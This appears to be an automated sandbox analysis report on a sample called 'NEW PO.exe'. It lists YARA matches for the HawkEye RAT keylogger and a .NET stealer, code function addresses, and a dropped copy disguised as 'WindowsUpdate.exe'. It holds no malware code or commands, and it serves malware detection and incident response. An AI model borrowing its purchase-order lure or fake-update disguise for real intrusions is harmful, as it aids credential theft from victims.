Source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.293293515.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.310799543.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.317923125.0000000002D5E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.368028200.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.292647600.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.399998942.000000000358E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.389083600.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.435142271.000000000330F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.370231808.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.369064581.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.367380540.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.315913694.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.292021486.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.313199266.0000000002D5E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000000.350144733.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.360431975.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.391692528.000000000359A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.362315745.0000000002ADF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000002.433632203.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000002.357544933.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000000.347313096.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000000.351819444.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000012.00000000.396224265.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\NEW PO.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 2424

Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 0_2_0318D2F4	0_2_0318D2F4
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 0_2_03187758	0_2_03187758
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 0_2_03187748	0_2_03187748
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_00DEB29C	7_2_00DEB29C
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_00DEC310	7_2_00DEC310
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_00DEB290	7_2_00DEB290
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_00DE99D0	7_2_00DE99D0
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_00DEDFD0	7_2_00DEDFD0
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_072BB5A0	7_2_072BB5A0
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_072BB258	7_2_072BB258
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_072B0040	7_2_072B0040
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_072BEF88	7_2_072BEF88
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_072BBE70	7_2_072BBE70
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_072B001F	7_2_072B001F
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_07A62788	7_2_07A62788
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_07A61FD0	7_2_07A61FD0
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_07A634D0	7_2_07A634D0
Source: C:\Users\user\Desktop\NEW PO.exe	Code function: 7_2_07A6B180	7_2_07A6B180
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00404419	10_2_00404419
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00404516	10_2_00404516
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00413538	10_2_00413538
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_004145A1	10_2_004145A1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_0040E639	10_2_0040E639
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_004337AF	10_2_004337AF
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_004399B1	10_2_004399B1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_0043DAE7	10_2_0043DAE7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00405CF6	10_2_00405CF6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00403F85	10_2_00403F85
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 10_2_00411F99	10_2_00411F99
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 11_2_00404DDB	11_2_00404DDB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 11_2_0040BD8A	11_2_0040BD8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 11_2_00404E4C	11_2_00404E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 11_2_00404EBD	11_2_00404EBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 11_2_00404F4E	11_2_00404F4E
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_00FBD2F4	15_2_00FBD2F4
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_00FB7758	15_2_00FB7758
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_00FB7748	15_2_00FB7748
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_050D0006	15_2_050D0006
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_050D0040	15_2_050D0040
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_050DE928	15_2_050DE928
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 15_2_050DE938	15_2_050DE938
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 16_2_0114B29C	16_2_0114B29C
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 16_2_0114C310	16_2_0114C310
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 16_2_0114B290	16_2_0114B290
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 16_2_011499D0	16_2_011499D0
Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe	Code function: 16_2_0114DFD0	16_2_0114DFD0

Source: NEW PO.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 7.0.NEW PO.exe.2d9bffc.45.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.2afd174.43.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.7ee0000.37.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.8660000.48.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.35f1ffc.44.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.409c0d.8.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.409c0d.8.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.45fa72.14.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.45fa72.14.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.45fa72.9.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.45fa72.9.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.45fa72.17.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.45fa72.17.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.2.WindowsUpdate.exe.8640000.9.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.408208.17.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.408208.17.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.408208.17.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.45fa72.17.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.45fa72.17.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.408208.40.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.408208.40.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.408208.40.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.408208.8.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.408208.8.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.NEW PO.exe.408208.8.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.409c0d.7.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.409c0d.7.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.45fa72.14.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.45fa72.14.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.7ee0000.49.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.NEW PO.exe.7ee0000.10.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.45fa72.12.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.45fa72.12.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.400000.21.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.409c0d.39.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.409c0d.39.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.0.NEW PO.exe.409c0d.27.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.0.NEW PO.exe.409c0d.27.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.NEW PO.exe.2af76d8.6.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.409c0d.22.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.409c0d.22.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.332d36c.31.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.NEW PO.exe.409c0d.2.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 7.2.NEW PO.exe.409c0d.2.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.8640000.35.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.0.WindowsUpdate.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.45fa72.23.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.45fa72.23.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.WindowsUpdate.exe.35e4248.43.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.WindowsUpdate.exe.409c0d.12.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 18.0.WindowsUpdate.exe.409c0d.12.raw.unpack, type: UNPACKEDPE	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 16.0.WindowsUpdate.exe.408208.23.raw.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 16.0.WindowsUpdate.exe.408208.23.raw.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
